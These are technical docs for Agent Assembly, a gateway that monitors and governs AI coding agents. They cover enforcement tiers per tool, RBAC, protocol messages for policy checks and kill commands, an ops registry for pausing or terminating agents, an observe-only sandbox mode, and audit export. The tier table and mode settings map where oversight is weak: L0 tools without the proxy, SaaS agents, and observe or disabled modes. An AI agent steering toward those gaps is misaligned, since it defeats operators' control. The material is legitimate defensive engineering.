SaaS-hosted tools execute remotely. AAASM’s enforcement capabilities (L2–L3) apply only to locally-running processes. This is a fundamental architectural limit, not a product gap.
L1 observability is available only if the user installs the observability adapter (browser extension or API hook). Without it, even L1 is not available.
These tools are out-of-scope for any enforcement stronger than L1 for v0.0.1.

Summary table

Tool	Audit	Policy Vis.	MCP Allowlist	Exec Block	File Block	Net Block	Sub-agent
Codex	L2	L2	L3	L3	L3	L2	L2
GitHub Copilot	L1	L1	L3	L0†	L0†	L1	L0
Windsurf Cascade	L1	L1	L3	L1†	L1†	L1	L1
Claude Code	TBD	TBD	TBD	TBD	TBD	TBD	TBD
SaaS Coding-Agent	L1	L1	L0	L0	L0	L0	L0

† These capabilities require aa-proxy (Layer 2) running alongside the tool for enforcement. Without the proxy, the declared tier drops to L0 (discovery/inventory only).

Relationship to the three interception layers

The dev-tool adapter tier system is separate from but complementary to AAASM’s three interception layers (SDK / proxy / eBPF). The layers provide runtime enforcement regardless of which tool is active; the adapter tiers describe what each specific tool’s native API exposes:

Layer	What it governs	Interaction with adapter tiers
Layer 1 — SDK shim (`aa-ffi-*`)	Agents that use the AAASM SDK explicitly	Provides L2 enforcement for SDK-aware tools independent of adapter tier
Layer 2 — `aa-proxy`	All outbound HTTPS from the machine	Provides L2 network/exec enforcement for any tool; fills gaps where adapter tier is L0 for exec/file/net
Layer 3 — `aa-ebpf` (Linux only)	SSL uprobes + exec/file syscalls at kernel level	Provides L1 detection + alerting for any tool; cannot modify traffic in flight (no redaction at this layer)

In practice, for tools where the adapter tier is L0 or L1 for exec/file/network enforcement, deploying aa-proxy alongside the tool upgrades effective enforcement to L2 for those dimensions without requiring a new adapter.

References

AAASM-199 — Agent Assembly SDK interception overview (DevToolAdapter trait + GovernanceLevel enum)
AAASM-201 — Claude Code adapter (pending; will update Claude Code row above)
AAASM-202 — Codex adapter
AAASM-203 — GitHub Copilot adapter
AAASM-204 — Windsurf Cascade adapter
AAASM-206 — Governance level (L0–L3) classification in policy schema (governance_level field in AgentRecord and policy conditions)
AAASM-918 — SaaS coding-agent adapter (pending; will finalize SaaS row above)
docs/src/architecture/system-architecture.md — Three-layer interception model
docs/src/policy-rbac.md — RBAC role matrix for policy mutations

Last updated: 2026-06-11 by Chisanan232

Policy RBAC Role Matrix

Auto-generated from the PolicyMutationRequiredRole table in aa-gateway/src/policy/rbac.rs. Do not edit by hand — run cargo run -p aa-api --bin generate_policy_rbac_doc to regenerate.

The 5 canonical RBAC roles in privilege order (highest → lowest): OrgAdmin > TeamAdmin > Developer > Viewer > Auditor Auditor may never mutate policies — all write attempts are denied.

Scope	create	update	delete
`global`	`org_admin`	`org_admin`	`org_admin`
`org`	`org_admin`	`org_admin`	`org_admin`
`team`	`team_admin`	`team_admin`	`team_admin`
`agent`	`developer`	`developer`	`developer`
`tool`	`developer`	`developer`	`developer`

Role Descriptions

org_admin — Full policy mutation rights across all scopes.
team_admin — Can mutate team-scoped policies and below (Agent, Tool).
developer — Can mutate agent- and tool-scoped policies only.
viewer — Read-only access — no writes permitted.
auditor — Read-only audit access — all write attempts denied regardless of scope.

Last updated: 2026-05-08 by Chisanan232

Protocol Specification Changelog

Scope: This changelog covers the Agent Assembly protocol specification only — proto message schemas, JSON schema, IPC framing contract, and SDK protocol conformance requirements. For runtime/crate release notes, see the project CHANGELOG when it exists.

All notable changes to the protocol specification are documented here. Format follows Keep a Changelog. Protocol versioning follows the policy in docs/versioning.md.

[v0.0.1] — 2026-04-28

Initial release of the Agent Assembly protocol specification.

Added

Services

AgentLifecycleService (proto/agent.proto) — RPC surface for agent registration, heartbeat, deregistration, and runtime control stream
PolicyService (proto/policy.proto) — synchronous policy check RPC for intercepting agent actions before execution
AuditService (proto/audit.proto) — event reporting and streaming RPC for immutable audit log ingestion

Agent lifecycle messages (`proto/agent.proto`)

RegisterRequest — agent startup registration carrying identity, framework, tool list, risk tier, public key, and arbitrary metadata
RegisterResponse — gateway issues credential token, assigns policy, sets heartbeat interval
HeartbeatRequest — periodic liveness signal carrying active run count and cumulative action count
HeartbeatResponse — gateway signals policy update and/or suspend request to agent
DeregisterRequest — clean or forced agent shutdown with optional reason string
DeregisterResponse — gateway confirms deregistration success and echoes agent identity
ControlStreamRequest — opens persistent server-streaming channel for runtime control
ControlCommand — oneof wrapper dispatching to one of four command variants:
- SuspendCommand — instructs agent to pause execution
- ResumeCommand — instructs agent to resume execution
- PolicyUpdateCommand — delivers updated policy document inline
- KillCommand — instructs agent to terminate with optional reason

Policy messages (`proto/policy.proto`)

CheckActionRequest — policy check request carrying agent identity, credential token, trace/span IDs, action type, and action-specific context
CheckActionResponse — policy decision carrying Decision enum, reason, policy rule reference, optional approval ID, optional redact instructions, and decision latency
ActionContext — oneof wrapper for the five action context subtypes:
- LLMCallContext — model name, prompt token count, and sampled prompt prefix
- ToolCallContext — tool name, source (mcp/builtin), JSON args, and target URL
- FileOpContext — operation type, file path, and byte count
- NetworkCallContext — method, URL, and header names
- ProcessExecContext — executable path and argument list
RedactInstructions — container for one or more redaction rules
RedactRule — field path (JSONPath) and replacement string for a single redaction
BatchCheckRequest — wraps multiple CheckActionRequest items for bulk evaluation
BatchCheckResponse — wraps corresponding CheckActionResponse items

Event messages (`proto/event.proto`)

EnvelopedEvent — typed event envelope with agent identity, timestamp, sequence number, and oneof payload for the five event subtypes
AlertTriggered — credential or policy violation alert with severity and matched pattern
ApprovalRequested — human-in-the-loop approval request with timeout and context summary
AgentStatusChanged — agent lifecycle state transition notification
BudgetThresholdHit — token or cost budget threshold breach notification
ApprovalDecision — outcome of a previously requested approval

Audit messages (`proto/audit.proto`)

AuditEvent — immutable audit record with agent identity, timestamp, sequence number, SHA-256 hash chain field, and oneof payload for five detail subtypes:
- LLMCallDetail — model, token counts, finish reason
- ToolCallDetail — tool name, source, args hash, result hash
- FileOpDetail — operation, path, byte count, hash
- NetworkCallDetail — method, URL, status code, response byte count
- ProcessExecDetail — executable, args hash, exit code
PolicyViolation — policy rule reference, decision, and triggering action summary
ApprovalEvent — approval request and decision pair linked by approval ID
ReportEventsRequest / ReportEventsResponse — unary bulk event submission
StreamEventsResponse — server acknowledgement for the streaming submission RPC

Common types (`proto/common.proto`)

AgentId — composite agent identity: org_id, team_id, agent_id (DID string)
Timestamp — millisecond-precision Unix timestamp (unix_ms int64)
Decision enum — ALLOW, DENY, PENDING, REDACT
ActionType enum — LLM_CALL, TOOL_CALL, FILE_OPERATION, NETWORK_CALL, PROCESS_EXEC, AGENT_SPAWN
RiskTier enum — LOW, MEDIUM, HIGH, CRITICAL

JSON Schema

schemas/policy/v1/policy-document.schema.json — PolicyDocument JSON Schema v1, defining the structure of policy rules evaluated by PolicyService
Example policy documents: schemas/examples/strict.yaml, balanced.yaml, audit-only.yaml

IPC framing contract

Transport: Unix domain socket (/var/run/aa-runtime.sock by default)
Framing: prost varint length-delimited encoding — each frame is a varint-encoded byte length followed by the raw proto bytes
Reference: prost::encode_length_delimited / prost::decode_length_delimited
Conformance vectors: conformance/vectors/ipc_framing/ (10 vectors)

Tagging runbook

Run the following commands only when AAASM-12 (Protocol Specification epic) is fully closed and all protocol tickets have been merged into master:

# Create annotated tag for the initial spec release
git tag -a spec/v0.0.1 -m "Protocol Specification v0.0.1 — initial release"

# Push the tag to the upstream remote
git push origin spec/v0.0.1

Tag namespace convention: spec/<version> — coexists with future runtime/<version>, sdk/<version> tags in the same monorepo without ambiguity.

Last updated: 2026-05-04 by Chisanan232

Migration Guide — [FILL IN: brief title, e.g. “`AgentId.agent_id` renamed to `AgentId.id`”]

Template instructions: Copy this file to docs/migration/<vX.Y-to-vZ.0>.md, fill in every [FILL IN] section, and delete these instruction lines. See the completed worked example in docs/versioning.md for a reference of what a finished guide looks like.

Breaking change introduced in: protocol/v[FILL IN] Deprecated since: protocol/v[FILL IN] (omit if not previously deprecated) Affected SDK versions: [FILL IN: e.g. “All SDKs using MessageName.field_name”] Estimated migration effort: [FILL IN: Low / Medium / High]

Low — mechanical find-and-replace, no logic change. Medium — logic changes in a small number of call sites. High — widespread changes or dependent schema updates required.

What changed

[FILL IN: One or two paragraphs describing what was removed, renamed, or altered and why. Include the field number, message name, and proto file. Explain the motivation briefly — e.g. naming consistency, type safety, protocol simplification.]

Before (`protocol/v[FILL IN].x`)

Proto encoding:

[FILL IN: show the relevant message with the old field]
MessageName {
  field_name: "example-value"   // field N — old name/type
}

Python SDK:

[FILL IN: show the old API call]
obj = MessageName(field_name="example-value")

Node.js SDK:

[FILL IN: show the old API call]
const obj = new MessageName({ fieldName: 'example-value' });

Go SDK:

[FILL IN: show the old API call]
obj := &pb.MessageName{FieldName: "example-value"}

After (`protocol/v[FILL IN].0+`)

Proto encoding:

[FILL IN: show the relevant message with the new field]
MessageName {
  new_field_name: "example-value"   // field M — new name/type
}

Python SDK:

[FILL IN: show the new API call]
obj = MessageName(new_field_name="example-value")

Node.js SDK:

[FILL IN: show the new API call]
const obj = new MessageName({ newFieldName: 'example-value' });

Go SDK:

[FILL IN: show the new API call]
obj := &pb.MessageName{NewFieldName: "example-value"}

Migration steps

[FILL IN: First step — e.g. “Search your codebase for all usages of MessageName.field_name.”]
[FILL IN: Second step — e.g. “Replace each with MessageName.new_field_name.”]
[FILL IN: Third step — e.g. “Run the conformance test suite to verify.”]
[FILL IN: Deployment order step if relevant — e.g. “Deploy the updated SDK before upgrading aa-runtime past vN.x (runtime vN.x still supports protocol/v(N-1)).”]

Verification

Run the conformance suite against a runtime at protocol/v[FILL IN]:

[FILL IN: exact command, e.g.]
cargo test -p conformance
python conformance/runner/runner.py --verbose

Expected: all vectors pass with no failures referencing [FILL IN: old field name].

Event: `topology.cross_team_edge`

Published by aa-gateway whenever an edge is inserted between two agents that belong to different teams. Both agents must have a non-NULL team_id in the agent registry; if either is missing the event is suppressed and an info-level log line is emitted instead.

Transport

Internal Tokio broadcast channel (tokio::sync::broadcast::Sender<CrossTeamEdgeEvent>). Channel capacity: 64. Slow consumers receive RecvError::Lagged(n) when they fall behind.

Subscribers call InMemoryEdgeRepo::subscribe_cross_team_events().

Payload

Rust type: aa_gateway::edges::CrossTeamEdgeEvent

Field	Type	Description
`edge_id`	`i64`	Auto-assigned id of the inserted edge
`source_agent_id`	`AgentId` (`[u8; 16]`)	Agent that originated the relationship
`source_team_id`	`String`	Team the source agent belongs to
`target_agent_id`	`AgentId` (`[u8; 16]`)	Agent that was the target
`target_team_id`	`String`	Team the target agent belongs to
`edge_type`	`EdgeType`	Semantic type: one of `delegates_to`, `calls`, `reads`, `writes`, `approves`, `messages`
`occurred_at`	`DateTime<Utc>`	UTC timestamp when the edge was recorded

Example (JSON-serialised for illustration)

{
  "edge_id": 42,
  "source_agent_id": "01010101010101010101010101010101",
  "source_team_id": "team-alpha",
  "target_agent_id": "02020202020202020202020202020202",
  "target_team_id": "team-beta",
  "edge_type": "messages",
  "occurred_at": "2026-05-10T04:00:00Z"
}

Publishing conditions

Scenario	Action
`source.team_id != target.team_id` (both set)	Publish `CrossTeamEdgeEvent`
Either `team_id` is `NULL`	Log at `INFO`; no event
`source.team_id == target.team_id`	No event

Consumer notes (AAASM-198)

Subscribe before inserting edges to avoid missing events on a lagged receiver.
The broadcast channel drops events for receivers that fall more than 64 messages behind — design consumers to process promptly or buffer independently.
edge_id can be used to fetch full edge metadata via GET /api/v1/agents/{id}/edges.

Last updated: 2026-05-10 by Chisanan232

In-Flight Ops Registry — Architecture

Status: Active design — PR-A landed (AAASM-1422). Scope: Gateway-side tracking of agent operations from CheckActionRequest ingestion through to terminal Completing/Terminated states, the IPC protocol that lets the dashboard observe and control those operations, and the SDK return-channel that propagates control signals back to running agents.

1 — Why this exists

The original audit pipeline records what already happened (AuditEvent is post-facto and immutable). The Live Ops dashboard (AAASM-1326, AAASM-1334) needs a live view of operations currently in flight: which agents are running right now, which are paused, which were just terminated. None of that existed before AAASM-1525 / AAASM-1422.

AAASM-1415 shipped the POST /api/v1/ops/{id}/{pause,resume,terminate} route shells as stubs that return 202 + log so the dashboard’s row-action menu could be wired without 404-ing. AAASM-1525 added the OpsRegistry skeleton in aa-api with a 3-state machine (Running / Paused / Terminated) and a client-driven POST /api/v1/ops registration endpoint. AAASM-1422 closes the remaining gap: gateway-side ingestion from the policy-check path, a 5-state model that distinguishes pre-allow from post-completion, and a sub-task plan for the IPC protocol and SDK enforcement.

2 — Decisions recorded for this iteration

Decision	Choice	Why
Op identifier (AC #2 of AAASM-1422)	`op_id = "{trace_id}:{span_id}"`	Already in `CheckActionRequest`; distributed-tracing-native; lets the dashboard re-match same-id `OpStateChanged` WebSocket events without a new id allocator. No protobuf changes required for PR-A.
Crate home	`aa-gateway::ops`, re-exported via `aa_api::ops`	Mirrors `BudgetTracker`, `AgentRegistry`, `PolicyEngine`. `PolicyServiceImpl` (in `aa-gateway`) can ingest without a reverse-crate dep into `aa-api`.
State model	5 states: `Pending`, `Running`, `Paused`, `Completing`, `Terminated`	Distinguishes “policy allow not yet decided” (`Pending`) and “action finished, draining” (`Completing`) from the active middle states. Aligns with AAASM-1422 description.
Storage primitive	`DashMap<String, OpRecord>`	Lock-free concurrent reads, shard-level write locks. Identical to `BudgetTracker.per_agent`.
Ingestion entry point	`OpsRegistry::ingest(op_id) -> OpRecord` keyed by `{trace_id}:{span_id}`, idempotent	Called from `PolicyServiceImpl::check_action` before policy evaluation so the op appears in `Pending` state even if the policy decision takes time.
Allow transition	`OpsRegistry::allow(op_id)`: `Pending → Running`	Called from `PolicyServiceImpl::check_action` after an `Allow` decision.
Complete transition	`OpsRegistry::complete(op_id)`: `Running → Completing`	Drained-out terminal state; entries stay readable briefly so the dashboard can render the completion before they’re swept.
Sweep policy	Background tokio task on the registry drops `Completing` + `Terminated` entries older than 60 s. Tick every 10 s. Configurable via `spawn_sweep_task_with(registry, tick, ttl_seconds)`. (AAASM-1657 PR-H)	Bounds registry memory while giving the dashboard ~10 s of grace to render the terminal state before it disappears.

3 — Data model

#![allow(unused)]
fn main() {
// aa-gateway/src/ops/mod.rs

pub enum OpState {
    Pending,     // ingested, awaiting policy decision
    Running,     // policy allowed; agent is actively executing
    Paused,      // operator paused via POST /api/v1/ops/{id}/pause
    Completing,  // action signalled complete, draining
    Terminated,  // operator terminated, or policy denied
}

pub struct OpRecord {
    pub op_id: String,        // "{trace_id}:{span_id}"
    pub state: OpState,
    pub registered_at: String,// RFC 3339 — first time the op id was seen
    pub updated_at: String,   // RFC 3339 — most recent transition
}

pub enum OpsError {
    NotFound,
    InvalidTransition,
}

pub struct OpsRegistry { /* DashMap<String, OpRecord> */ }
}

4 — State machine

stateDiagram-v2
    [*] --> Pending: ingest()
    Pending --> Running: allow()
    Pending --> Terminated: deny() / terminate()
    Running --> Paused: pause()
    Paused --> Running: resume()
    Running --> Completing: complete()
    Running --> Terminated: terminate()
    Paused --> Terminated: terminate()
    Completing --> [*]: (sweep — PR-H)
    Terminated --> [*]: (sweep — PR-H)

Transition rules:

From → To	Method	Notes
(none) → `Pending`	`ingest(op_id)`	Idempotent re-call returns the existing record unchanged.
`Pending` → `Running`	`allow(op_id)`	Called from policy-engine `Allow` path.
`Pending` → `Terminated`	`terminate(op_id)`	Policy `Deny` path may take this directly (PR-H).
`Running` → `Paused`	`pause(op_id)`	Operator action via HTTP.
`Paused` → `Running`	`resume(op_id)`	Operator action via HTTP.
`Running` → `Completing`	`complete(op_id)`	Called by SDK when the agent finishes the action (PR-E/F/G).
any non-terminal → `Terminated`	`terminate(op_id)`	Operator force-termination.
any other pair	(invalid)	Returns `OpsError::InvalidTransition`.

The registry remains idempotent on terminal states: calling terminate on an already-Terminated op returns the existing record without erroring.

5 — Ingestion path

agent ──gRPC──▶ PolicyServiceImpl::check_action(req)
                  │
                  ├─▶ ops_registry.ingest("{trace_id}:{span_id}")
                  │     // entry created in `Pending`
                  │
                  ├─▶ engine.evaluate(req)  ─▶  EvaluationResult
                  │
                  ├─▶ if Allow:
                  │      ops_registry.allow(op_id)   // Pending → Running
                  │   if Deny:
                  │      ops_registry.terminate(op_id) // Pending → Terminated  (PR-H)
                  │
                  └─▶ Response { decision, reason, ... }

This means: by the time the SDK receives the CheckActionResponse, the gateway-side registry has the op recorded and the dashboard sees it in the correct state via the WebSocket stream (PR-B).

PR-A ships the ingest() + allow() call sites. The terminate() on Deny is deferred to PR-H so PR-A keeps a small surface area.

6 — IPC sketch (PR-D)

Today the gateway → SDK channel is request/response only (CheckActionRequest → CheckActionResponse). For real pause / terminate enforcement, the SDK must learn about state changes while the action is in flight.

Two viable shapes:

Server-streaming OpControlStream — SDK opens a long-lived stream on register_agent. Gateway pushes {op_id, signal: pause|resume|terminate} messages. SDK acknowledges via a separate unary RPC. (Recommended in PR-D.)
Bidirectional OperationChannel — replace per-action CheckAction with a single bidi stream. Heavier protocol churn; deferred.

The SDK then cooperatively yields on pause, resumes on resume, and fast-fails on terminate. Each SDK (Python / Node / Go) ships its own enforcement layer in PR-E / PR-F / PR-G.

7 — Dashboard correlation (PR-C)

Today the dashboard’s useLiveOpsStream hook builds an in-memory map keyed by GovernanceEvent.id (monotonic, unique per event). Two events for the same op therefore can’t be correlated — the override-clear logic in LiveOpsPage never sees its target id again.

After PR-B/PR-C, the WebSocket emits a new OpStateChanged payload variant:

{
  "event_type": "ops_change",
  "agent_id": "agent-7",
  "payload": {
    "op_id": "trace-abc:span-1",   // stable across the op's lifetime
    "state": "running",            // OpState serialized snake_case
    "updated_at": "2026-05-20T09:32:20.822Z"
  }
}

The dashboard then keys its map by payload.op_id. The override-clear logic matches on the same key, so a pause followed by the server’s confirming paused event auto-clears the optimistic state without manual intervention.

8 — Sub-task plan

Sub-task	Scope	Touches
PR-B	`aa-proto` + `aa-api` `OpStateChanged` event type & payload schema	`proto/`, `aa-api/src/models/`, OpenAPI
PR-C	Dashboard id-model rework — `useLiveOpsStream` correlates by `op_id`, override auto-clear	`dashboard/src/`
PR-D	Gateway → SDK bidirectional return-channel: proto `OpControlStream` + `aa-proto` regen	`proto/`, SDK shims
PR-E	`python-sdk` cooperative pause + fast-fail terminate at shim layer	`python-sdk` repo
PR-F	`node-sdk` equivalent	`node-sdk` repo
PR-G	`go-sdk` equivalent	`go-sdk` repo
PR-H	Replace AAASM-1415 stub handlers with registry-backed transitions; emit `OpStateChanged` on each transition; add `Pending → Terminated` on policy Deny; add sweep policy	`aa-api/src/routes/ops.rs`, `aa-gateway/src/service/policy_service.rs`

9 — Out of scope for this Task (AAASM-1422)

Persistence across gateway restarts (registry is in-memory; restart re-empties it and the dashboard reconciles via the existing WS reconnect).
Multi-gateway cluster coordination (sharded by agent_id-affinity in a later release; not on the roadmap for v0.0.1).
Cross-team aggregation views beyond what the existing Live Ops page surfaces.

10 — References

AAASM-1422 — this Task
AAASM-1415 — stub /ops/{id}/{pause,resume,terminate} endpoints
AAASM-1525 — OpsRegistry skeleton with 3-state machine
AAASM-1326 / AAASM-1334 — Live Ops dashboard design + row actions

Last updated: 2026-05-21 by Chisanan232

Sandbox / Dry-Run Mode

Run any policy in observe-only mode for a few days before flipping the switch to live enforcement.

Sandbox mode is the governance analogue of a database transaction ROLLBACK: the gateway evaluates every rule, records every would-be decision in the audit log, and applies none of them. The agent proceeds as if no policy were in effect. Once you’ve reviewed the would-be violations and tuned the policy, you cut over to live enforce mode with a one-line change.

The feature is part of the open-source core — not an enterprise add-on.

How it works

Sandbox mode is an enforcement posture, not a separate runtime. It only changes what the gateway does after a policy decision is computed:

Decision	Enforce mode (default)	Observe / dry-run mode
`Allow`	Action proceeds	Action proceeds (identical)
`Deny`	Action blocked; error returned	Action proceeds; `dry_run: true` shadow event written to the audit log
`Redact`	Payload sanitised	Unredacted payload forwarded; shadow event written
`RequiresApproval`	Action halts pending review	Action proceeds; shadow event written

Every shadow event carries the full decision context: which rule matched (shadow_decision), what the rejection reason would have been (shadow_reason), and a dry_run: true flag the audit consumer can filter on.

Quick start — 5 steps

# 1. Author a policy in observe mode (zero risk to running agents)
cat > coding-team-sandbox.yaml << 'EOF'
name: coding-team-sandbox
enforcement_mode: observe       # ← the one new field

rules:
  - action: deny
    match:
      tool_name: bash
      command_pattern: "rm -rf"
  - action: redact
    match:
      output_contains_pattern: "(AKIA|ghp_)[A-Za-z0-9]+"
EOF

# 2. Apply the policy
aasm policy apply --file coding-team-sandbox.yaml

# 3. Run an agent under observe-mode governance
aasm run --observe claude --workspace .

# 4. After a few days, review what would have been blocked
aasm audit list --dry-run-only --since 7d

# 5. Confident the policy is right? Flip to live enforcement.
sed -i 's/enforcement_mode: observe/enforcement_mode: enforce/' coding-team-sandbox.yaml
aasm policy apply --file coding-team-sandbox.yaml

Policy configuration

enforcement_mode is a top-level optional field on the policy document:

name: my-policy
enforcement_mode: observe       # "enforce" (default) | "observe" | "disabled"

rules: [ ... ]

When the field is omitted, the policy defaults to enforce — the pre-feature behaviour. Existing on-disk policies upgrade transparently.

Per-agent overrides via agent_overrides are also supported, so you can run a single experimental agent in observe mode while the rest of the team stays in live enforce:

name: coding-team-policy
enforcement_mode: enforce

agent_overrides:
  - agent_glob: "experimental-*"
    enforcement_mode: observe

Resolution order (highest priority first):

Per-agent override — agent_overrides block in the policy YAML, or enforcement_mode on the agent’s RegisterAgent RPC payload.
Policy document default — the top-level enforcement_mode field.
Server-wide default — enforce.

CLI reference

`aasm run --observe`

Launches a managed AI dev tool with observe-mode governance for the duration of the session.

# Boolean shorthand — most common case
aasm run --observe claude --workspace .

# Explicit form — interchangeable with the above
aasm run --enforcement-mode observe claude --workspace .

# Disabled mode — only valid in hermetic test environments
aasm run --enforcement-mode disabled codex --workspace .

# Combine with --dry-run to preview the launch without executing the tool
aasm run --observe --dry-run claude --workspace .

When observe mode is active, a one-time banner prints to stderr ahead of any tool output:

⚠️  [AAASM] Running in sandbox/observe mode.
    Policy decisions are recorded but NOT enforced.
    Review captured events: aa audit list --dry-run-only

The child process inherits AA_ENFORCEMENT_MODE=observe in its environment so tools that env-sniff (or downstream wrappers) can surface their own observe-mode badge.

--observe and --enforcement-mode are mutually exclusive — passing both fails fast at clap-parse time.

`aasm audit list --dry-run-only`

Filters the audit log to shadow events only:

# Show shadow events from the last 24h
aasm audit list --dry-run-only --since 24h

# Compose with other filters
aasm audit list --dry-run-only --since 7d --agent "codex-*"

# Machine-readable output for CI gates
aasm audit list --dry-run-only --format json

The flag is exclusive: by default aasm audit list HIDES shadow events so operators don’t see them mixed with live decisions; --dry-run-only flips that to show ONLY shadow events.

SDK usage

All three SDKs expose the same posture surface. Pass an enforcement_mode (Python / Go) or enforcementMode (Node.js) at agent registration:

Python

from agent_assembly import init_assembly

ctx = init_assembly(
    gateway_url="http://localhost:8080",
    api_key="...",
    agent_id="experimental-agent-001",
    enforcement_mode="observe",   # "enforce" | "observe" | "disabled"
)

The parameter is keyword-only; the type is Literal["enforce", "observe", "disabled"]. Omitting it preserves the pre-feature wire shape (the gateway applies its server-side enforce default).

Node.js / TypeScript

import { initAssembly, type EnforcementMode } from "@agent-assembly/sdk";

const ctx = await initAssembly({
  gatewayUrl: "http://localhost:8080",
  apiKey: "...",
  agentId: "experimental-agent-001",
  enforcementMode: "observe",   // 'enforce' | 'observe' | 'disabled'
});

The EnforcementMode union narrows at compile time; runtime validation catches typos from JS / JSON-config / dynamic-input callers with a RangeError.

Go

import "github.com/agent-assembly/go-sdk/assembly"

a, err := assembly.Init(ctx,
    assembly.WithGatewayURL("http://localhost:8080"),
    assembly.WithAPIKey("..."),
    assembly.WithSelfAgentID("experimental-agent-001"),
    assembly.WithEnforcementMode(assembly.EnforcementModeObserve),
)

assembly.EnforcementMode is a string-typed alias; the empty zero value omits the field from the registration body, preserving pre-feature wire shape.

CI integration — the policy-regression gate

A common observe-mode use case: gate every PR on “would my policy change block any existing agent workflow?”

# .github/workflows/policy-regression.yml
jobs:
  policy-regression:
    steps:
      - name: Run agent under observe-mode governance
        run: aasm run --observe codex -- codex "refactor src/auth.py"

      - name: Fail the PR on any would-be deny
        run: |
          BLOCKS=$(aasm audit list --dry-run-only --format json \
                   | jq '[.[] | select(.shadow_decision == "deny")] | length')
          if [ "$BLOCKS" -gt 0 ]; then
            echo "Policy regression: $BLOCKS actions would be blocked"
            aasm audit list --dry-run-only --format table
            exit 1
          fi

The exclusive-filter semantic of --dry-run-only means this gate doesn’t pick up unrelated live-enforcement events from other agents on the same gateway.

Dashboard

The dashboard exposes a SandboxSummaryCard component that renders the per-policy observe-mode aggregates:

┌─ SANDBOX SUMMARY ────────────────────────────────┐
│ coding-team-sandbox (last 24h)                    │
│                                                   │
│  47        12         3                           │
│  Would-be  Would-be   Would-be                    │
│  denies    redactions pending approvals           │
│                                                   │
│  Top matched rule: block-bash-rm-rf (31×)         │
│                                                   │
│  [View all events]  [Export CSV]  [Enable live →] │
└───────────────────────────────────────────────────┘

The amber colour is intentional — it visually contrasts with the dashboard’s red (live-deny) and green (live-allow) tokens so an operator can tell at a glance whether they’re looking at observe-mode aggregates or live enforcement data.

Status (2026-05): the card primitive is shipped (AAASM-1563). The full integration — wiring it into Policy detail, the audit-log toggle, the amber row badge, and the “Enable live enforcement” action — is tracked under AAASM-1911 and depends on aa-api surface changes that aren’t in this release.

Graduating to live enforcement

Once you’ve reviewed the shadow events and tuned the policy:

Inspect the most-common would-be violations:

aasm audit list --dry-run-only --since 7d --format json \
  | jq 'group_by(.shadow_decision) | map({decision: .[0].shadow_decision, count: length})'

Adjust the policy — tighten matchers that fired too eagerly, relax ones that blocked legitimate work.
Re-apply in observe mode for another short window to confirm the tuned policy behaves as expected.

Flip to enforce:

enforcement_mode: enforce

aasm policy apply --file my-policy.yaml

The cutover is instantaneous from the next CheckAction call onward — no agent restart required. Already-in-flight actions evaluated before the swap keep their original posture.

FAQ

Does observe mode affect performance? No measurable difference. The rule pipeline runs identically; the only added work is writing the shadow audit event when a non-Allow decision would have fired. That’s the same audit-write path live enforcement already uses, so the per-request cost is dominated by the rule evaluation itself.

Are redacted payloads ever stored in observe mode? No. The redact decision in observe mode forwards the unredacted payload to the agent (that’s the whole point — “what would have happened if we’d enforced”). The shadow audit event records that a redact rule matched, but neither the would-be redacted version nor the raw payload is persisted as a separate artefact. The audit pipeline’s existing PII-scanner pass still applies before any event is written.

Can I set observe mode per-agent without changing the policy? Yes — three ways:

CLI: aasm run --observe <tool> for the duration of that session.
SDK: pass enforcement_mode="observe" (Python / Go) or enforcementMode: "observe" (Node.js) at initAssembly.
Policy YAML: agent_overrides block targeting an agent_glob.

The per-agent override always wins over the policy document’s default.

What happens to an agent that’s mid-action when I flip from observe to enforce? The action that’s already through CheckAction keeps its observe-mode disposition (allowed). The very next CheckAction call sees the new posture and starts enforcing. There’s no in-flight rollback.

Does the SDK have any guard against accidentally registering in observe mode? The SDK doesn’t second-guess the operator — observe mode is a deliberate posture. What the SDK does is:

Reject typos (e.g. "obesrve") with a clear error at init time
Default to “no opinion” (omits the field from the registration body) so a pre-feature SDK call gets the gateway’s server-side enforce default — only operators who explicitly opt in get observe mode

Can I use observe mode in production for a long-running agent? That’s the recommended pattern for new policies — run them in observe mode for a week, review the shadow events, then cut over. The audit log retention follows your normal retention policy, so the shadow events are queryable for as long as live events.

Compliance Export

aasm audit compliance-export produces a full-fidelity export of a per-session audit JSONL file for downstream regulatory review and SIEM ingestion. Unlike aasm audit export (which queries the live gateway through /api/v1/logs and emits a slim summary view), this command reads directly from the on-disk JSONL files written by the gateway’s AuditWriter, preserving the hash chain, credential findings, and delegation lineage that an auditor needs to verify integrity offline.

When to use

Use aasm audit compliance-export whenever the produced bytes will leave the gateway operator’s trust boundary — for example:

Annual EU AI Act / SOC 2 evidence packs.
Continuous SIEM ingestion (Splunk, ELK, Datadog) where each entry is treated as one log line.
Cold-storage archives that must survive a future schema upgrade.

Use aasm audit export for the operational summary view (CSV / JSON array of the slim REST shape) when you only need a quick at-a-glance report and the consumer does not need the hash chain.

Output format

The default --format jsonl emits one ComplianceRecord per line. Each record carries:

Field	Meaning
`seq`	Monotonic sequence within the session.
`timestamp`	ISO 8601 UTC.
`event_type`	`ToolCallIntercepted`, `PolicyViolation`, etc.
`agent_id`, `session_id`	Hex-encoded 16-byte identifiers.
`payload`	Pre-serialised JSON of the decision context.
`previous_hash`, `entry_hash`	Hex-encoded SHA-256 anchors of the tamper-evident chain.
`credential_findings`	Detected credential kinds + byte offsets (never the raw secret).
`redacted_payload`	Post-redaction text when the gateway substituted secrets, `null` when clean.
`root_agent_id`, `parent_agent_id`, `team_id`, `delegation_reason`, `spawned_by_tool`, `depth`	Lineage fields when the originating entry recorded them.

--format json produces a pretty-printed JSON array of the same records for human review. --format csv produces a flat spreadsheet view with the regulator-relevant columns plus a credential_findings_count and a boolean redacted flag; the payload body and lineage are dropped from CSV to keep the file approachable in spreadsheet tools — use JSONL for full fidelity.

Common invocations

Export an entire session in JSONL to a file:

aasm audit compliance-export \
  --input  /var/lib/aa-gateway/audit/session-<hex>.jsonl \
  --format jsonl \
  --output-file ./session.jsonl

Restrict to PolicyViolation entries in the last 24 hours and write to stdout (pipe-friendly):

aasm audit compliance-export \
  --input      /var/lib/aa-gateway/audit/session-<hex>.jsonl \
  --event-type PolicyViolation \
  --since      24h

Generate an EU AI Act evidence pack with a regulatory header:

aasm audit compliance-export \
  --input      /var/lib/aa-gateway/audit/session-<hex>.jsonl \
  --format     jsonl \
  --compliance eu-ai-act \
  --output-file ./eu-ai-act-evidence.jsonl

The --compliance header lines begin with # so JSONL ingestors that treat # as a comment skip them automatically; ingestors that do not should be configured to strip the header band on the way in.

Verifying the export

The export carries the same hash chain as the source JSONL. To verify chain integrity offline, run:

aasm audit verify-chain /var/lib/aa-gateway/audit/session-<hex>.jsonl

